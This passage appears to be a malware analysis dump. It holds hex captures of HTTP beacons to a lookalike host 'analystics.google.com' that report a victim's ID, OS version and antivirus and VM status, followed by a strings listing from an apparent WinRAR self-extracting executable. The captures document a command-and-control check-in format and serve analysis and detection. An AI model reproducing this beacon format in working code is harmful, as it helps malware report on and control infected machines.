0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d543258 47467373 67685958 76542048   MT2XGFssghYXvT H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

0x00000000 (00000)   47455420 2f706870 62622f67 65742e70   GET /phpbb/get.p
0x00000010 (00016)   68703f69 643d4330 35393930 30414541   hp?id=C059900AEA
0x00000020 (00032)   37354530 36465858 58585858 58585858   75E06FXXXXXXXXXX
0x00000030 (00048)   58583030 3030266b 65793d33 36383326   XX0000&key=3683&
0x00000040 (00064)   61763d30 26766d3d 3026616c 3d302670   av=0&vm=0&al=0&p
0x00000050 (00080)   3d323931 266f733d 352e312e 32363030   =291&os=5.1.2600
0x00000060 (00096)   2e33267a 3d343538 26686173 683d4376   .3&z=458&hash=Cv
0x00000070 (00112)   436e426a 566a3849 4f4d3333 41394c66   CnBjVj8IOM33A9Lf
0x00000080 (00128)   4f476442 6b6e6a79 3961577a 414a4645   OGdBknjy9aWzAJFE
0x00000090 (00144)   384a7837 72487455 5437765a 36317a67   8Jx7rHtUT7vZ61zg
0x000000a0 (00160)   57796732 54683663 59797836 452b6646   Wyg2Th6cYyx6E+fF
0x000000b0 (00176)   36715136 38346a47 437a5758 4f5a3746   6qQ684jGCzWXOZ7F
0x000000c0 (00192)   4d54325a 78505779 63726c79 6e322048   MT2ZxPWycrlyn2 H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a2061   TTP/1.1..Host: a
0x000000e0 (00224)   6e616c79 73746963 732e676f 6f676c65   nalystics.google
0x000000f0 (00240)   2e636f6d 0d0a0d0a                     .com....

Strings

strcatVirtualProtect.
.M.
.
.Q.
...i.
.
.
...
U(e
.:T.Z.
.
.$.
\
.CC
 
l.....
.....................

 1993-%d
Accept
]aY)
Bro&wse...
by Alexander Roshal
bytes
Cancel
&Cancel
Cannot create folder %s
Cannot create %s
Cannot open %s
Close
Confirm file replace
Copyright 
CRC failed in %s
DCRC failed in the encrypted file %s. Corrupt file or wrong password.
Decline
&Destination folder
eRichEdit
ErroraErrors encountered while performing the operation
Extract
Extracting files to %s folder$Extracting files to temporary folder
Extracting from %s
Extracting %s
Extraction progress
File close error
folder is not accessiblelSome files could not be created.
                                 H
         (((((                  H
         h((((                  H
~hRichEdit20W
Install
	jmsctls_progress32
KERNEL32.DLL
License
LICENSEDLG	RENAMEDLG
Look at the information window for more details
modified on
mscoree.dll
MS Shell Dlg 2
Next volume
Not enough memory
No to A&ll
ntdll.dll
Packed data CRC failed in %s
Please close all applications, reboot Windows and restart this installation\Some installation files are corrupt.
Please download a fresh copy and retry the installation
Read error
Rename
&Rename
Rename file
REPLACEFILEDLG
Select destination folder
Skipping %s
STARTDLG
The archive comment is corrupt
The archive header is corrupt
The file "%s" header is corrupt%The archive comment header is corrupt
The following file already exists
The required volume is absent2The archive is either in unknown format or damaged
TITLE_BMP
=Total path and file name length must not exceed %d characters
Unexpected end of archive
Unknown method in %s
WinRAR self-extracting archive
with this one?
Would you like to replace the existing file
Wrong password for %s&Write error. Probably the disk is full
&Yes
Yes to &All
                          
 "" """!
/~/^/~/
.....!
" " """!
"" " "" 
"" "!" 
"" """!
""" " 
""" "  
""" ""!
""" """""
"""" """!
""""" 
""""""
"""""" 
""""""!
""""""" 
""""""""
"""""""""!
""""""""""
""""""""""""
""""""""""""!
""""""""""""""
"""""""""""""""""""!
""""""""""""""""""""
 !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`abcdefghijklmnopqrstuvwxyz{|}~
 !"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~
0A@@Ju
0=_M"|@
0SSSSS
%1*0Lzy
17>`C2
1Q!LE\q
1;#U"p
{1VEd3
$2" """"
--+,21
2&"6RFBVrfbv
2&"6RFBVrfgv
2&"6RGCWsgbw
2&"6RGCWsgcv
2CK6RFB3
2&Ne''.Vrfbv
"2"R"2"
2RB9]{bRrU
|2zDx"
^3]];;
=3-	0'`%SPmw
$32""""34"
$3"#4"
39#XP DJpy|u
"3B""""$3"
"3B""$3"!
"3B""""""""""C2!
$3B""""""""C4"
$3B""""""C4"
$3B""C4"
3e@u5E;U?
3%j*De
3-K`cBB
3](&P3Z
3W~A	|
3YW(SX18
:4KHGhpy{
4V\)PUq
5 2;_bkG"z
5;"|CmS}idp
5CT$UH%t5$5L1g
5IEiVydW~	
5iZkJ{zKu'
5opuU{yK	Z
5oru'd
5YnZ[H
&"62&"6RFBVrfbv
65z_Ym
6~B6>r
6e\uVEnUv
/}6fM5
&"6^FNV
&=6MF]Vmf}v
6R<BUs
&"6RFBVrfb
+7;%4A
7]4u%c
+7I-9=
(7r'27
8$0Z`T@u`my
84'7f#>?
888888
8!90E@sF
8,DUq*
8[&K4{
8tBJjbl
]+-+=9
9@cuPa`np
*'-9K1
9q3VNygc
abcdefghijklmnopqrstuvwxyz
ABCDEFGHIJKLMNOPQRSTUVWXYZ
AeJp~H
@?Aj`&
aljqe	D
alprKeCw
An application has made an attempt to load the C runtime library incorrectly.
ANlsP{Ka(
AoVxfHvX
ARUQ{}	
- Attempt to initialize the CRT more than once.
- Attempt to use MSIL code from this assembly during native code initialization
August
aVI{V	
A*YZ1J
&b6R,B^r?
"Bfy.;
!bH6w$
BJ:9=_{
B>Q&om
bvmAjn
#BVrfLv
bwsgCTPE
bwsg@PZO
BX;p?@F
{bY<2!
BYWz5z'
C2_)&N
"C""4"!
c{6Ctt
CB """"
%)c%F=
%:cjcc
CjYeI 
cksyC[6
C^n:Au
CorExitProcess
CreateWindowExA
- CRT not initialized
Cr~+y"
c|sl&T
cwsd@RV@
CYYE""B
"""" ""D!
@.data
++++++dd
dddd, MMMM dd, yyyy
DDehhH
December
DecodePointer
DefWindowProcA
DeleteCriticalSection
DispatchMessageA
DjTzZtJd:
#dnUHw
dOcM|x
DOMAIN error
dSq^eh@s$
d~tND^U
}E@;<<//
e1,|u}(
E3Uk%65B
-eAu^EnUl
*'ECjs
>eFuPEcU
E+GNZ?gK
eGu\EmUp
EJj+ax
_eJuRE{Uo
+EKEkeke
EKEkEKE
+EKEkEKE+
+EKEkEKE+]
|EL $0I%F
EncodePointer
EnterCriticalSection
+eNuRE{Ud
equ|E3UC%L5,
]Er6NF
/{e?u/
e)u9EI
_e/u?#d#
_e/u?D
_e/u?E
_e*u?E
{e/u?E
+e@u{E
	e	u-E=UM%X5h
.e|uLE\UMl
e<uLG\
e~uNELU,%<5
_e/u?U
%EVU!m
ExitProcess
^fbiRY)I-9=
FBVrfbv
February
feNu>E=UE%15>
[.ff]8F
FF\^'b
FhWydJu[
- floating point support not loaded
FlsAlloc
FlsFree
FlsGetValue
FlsSetValue
FreeEnvironmentStringsA
FreeEnvironmentStringsW
Friday
fT&AE)
fV9 $u
F_VZmvF
&,FwW~
,FYFKQns
#f,z(F
))[[)G1x
g=Cy_2
G?dfvW9
GetACP
GetActiveWindow
GetCommandLineA
GetCPInfo
GetCurrentProcess
GetCurrentProcessId
GetCurrentThreadId
GetEnvironmentStrings
GetEnvironmentStringsW
GetFileType
GetLastActivePopup
GetLastError
GetLocaleInfoA
GetMessageA
GetModuleFileNameA
GetModuleHandleA
GetModuleHandleW
GetOEMCP
GetProcAddress
GetProcessHeap
GetProcessWindowStation
GetStartupInfoA
GetStdHandle
GetStringTypeA
GetStringTypeW
GetSystemMetrics
GetSystemTimeAsFileTime
GetTickCount
GetUserObjectInformationA
GetVersionExA
GGGGG.
GijE`Np^
Gi)(Oj
GJEOB7Z
gpt`E_[M
g+ ]uMEl0C
H0{Pjx
h6 	{9K
HeapAlloc
HeapCreate
HeapFree
HeapReAlloc
HeapSize
heeh$$$
@HE/ET
HH:mm:ss
<=Hl+c
hrNV[`nt
h|xmIZ^J
/)I-9=
I]9I]#d
I9rm8I
}i^de&L
IDM\OT
iF|VrTPD
i*fXB<
IK]\|ew
InitializeCriticalSectionAndSpinCount
InterlockedDecrement
InterlockedIncrement
I.^pNN>
IsDebuggerPresent
IsValidCodePage
IX>PPk(^
iz~jNZ_H
j9p	uL
JanFebMarAprMayJunJulAugSepOctNovDec
January
{<jD.#JemDGejQ
|Jdz~B
jDZOJd
jDZtJd
-je/hU"
j@j ^V
?jJ{zK
jm<^'-5U
JQ''''n 
jQW*?f
!ju)e_#/
JuK&a&p
JWP|RFZ
{jYV>BI
&`k5yxRM6UH'
K9yk#x
KB{?]z
~KBz^uF
kEKEk&"6RFBVrfbv
kernel32.dll
KERNEL32.dll
KME\U,%<5
KpT]%<
K:rV	6
*kzKSJ9
l4+pTIQ
L(`@548
LCMapStringA
LCMapStringW
LcP~gJJd
LeaveCriticalSection
le\EL5'(,7
}LEL~F5
LE\U,%>5
le|u9/
le|uLE
le|uLE\U
le|uLE\U,%<%
le|uLE^U.%4
le|uLE\U,%<5
le|uLE\U,%|5
le|uLE\U,%<5L
le|uLE\U,%<WeweW
le|uLM%U,%<5
lFseDQZL
lL<B6#
LoadLibraryA
l"P|0\
}lR+73_9GNf
L||UcPg
`L|(&x	KC
L$Y>L.
M-+3jxA)
};MdV&-,>
Meq$GS4#'
MessageBoxA
MfEv}F
Microsoft Visual C++ Runtime Library
MM/dd/yy
Monday
m_p; y
mQHA8q
MultiByteToWideChar
MY)I-9=_
nd~tND^T,
nIIX>PPSS
- not enough space for arguments
- not enough space for environment
- not enough space for locale information
- not enough space for lowio initialization
- not enough space for _onexit/atexit table
- not enough space for stdio initialization
- not enough space for thread data
November
N`^pn@~P
N`^poA
@nQxfHwY
`nR8B	F
N`_rmCr\
nse8I\
NWvc/\
'>`|NZb
Oa_rlBs^
October
oe^TPF1
Oe/u?E
oe~uLE
OracleClassEx
OU*ejL?
o~uYn>k\a
,o-vGA
(-oWWW44
;p{hI,0
Please contact the application's support team for more information.
po{wx_
PPPPPPPP
Program: 
<program name unknown>
- pure virtual function call
p!!W44
py\~LE\U,%<5
PY|uPE
Qe5:uDb&
qfbtwb_hO
]qJEf0
=QK|)qm
	^QlHk
[qn\]O
Q====OO,,
QueryPerformanceCounter
QY<A,&
-_r/4<G4
R5@MZv
R{Cs[C
`.rdata
RegisterClassExA
Rp{z@*
RtlUnwind
runtime error 
Runtime Error!
rYe=[9
RYJV3}y
Rzlh{PxM
~RZORn
|	S8A>
s!9$2h
Saturday
September
SetHandleCount
SetLastError
SetUnhandledExceptionFilter
ShowWindow
SING error
-sqQhn9
strstr
Sunday
SunMonTueWedThuFriSat
\SZ7Jszc
:#*SZCJszcj
#*SZCJTz
??TE""B
TerminateProcess
This application has requested the Runtime to terminate it in an unusual way.
This indicates a bug in your application.
This indicates a bug in your application. It is most likely the result of calling an MSIL-compiled (/clr) function from a native constructor or from DllMain.
!This program cannot be run in DOS mode.
Thursday
< tK<	tG
TLOSS error
TlsAlloc
TlsFree
TlsGetValue
TlsSetValue
TranslateAcceleratorA
TranslateMessage
t"SS9]
t$<"u	3
Tuesday
tu-+I%
;t$,v-
tvpDOd
tvwx4G\up
t+WWVPV
TXPH=f
]t-X\r
TY}tRm
,,,, u
u#)0UB]R4a
\u5E?UIJL5
u8E3;@MY5m
UDeV0g
UD%I4,f
u!E2Ux%U5,
u"E[E;
u%E|UI%
uFEnUX%
@uFS=(C8
ugEOU/
{UkE[uKd:
{UkE[uKe:
UKwW%K67
Ul%|5L
uL-6D,
uLEqUO%L5
Ule|uL
uLE}Uv
- unable to initialize heap
- unable to open console device
- unexpected heap error
- unexpected multithread lock error
UnhandledExceptionFilter
UN%Y5o
UpdateWindow
`uqeARVB
uQ$PC )B3
UQPXY]Y[
URPQQh`VB
USER32.dll
USER32.DLL
Uys!=J
/uZ0E0^
UZ%X5m
!vC4M4,
)VFMh'
vG4a;Q
VirtualAlloc
VirtualFree
v\lAQ~kn0P 
<VlrA%
vm:2i9
v	N+D$
v\sMCrXv
VV_bXa
w4|a)Q
]&W63F&2
W^e|5L
Wednesday
WideCharToMultiByte
wNSlD"
wqHAXQ(
w&"*RBJ
WriteFile
_xbd4Zt
_X$CIFgvoE
x|iM+c
Xl[F	2
xlH\XL
: +;XO
xXcF4=F2%3
XY=C5c
(*Y|&+
)y)13oz
y}9ghTq
y_ak?8W
???>YB
Yd=gvB
Ye'u5E
?Y'I-9
y}i:Y]IY9=)~
>=Yt1j
y!`V)"1
yxbhm3
-/-.z?
Z0N):Q
z1jDZtJd:
/ZCc2$"
zFjDoeJ
zKjZZjJz:
]ZM+zAj
zpE#]|Y
)ZrC	bf
Zs}3:vY
Zt/d:g
zTjDZtJ
zTjDZtJd:
zTj:ZTJD:4*$
ztvmE	
zUjE? &
ZXJXZtJd:
zxkEZGJt:
ZxK	xJi
@Z`z@ZG_&
ZZZZZ2U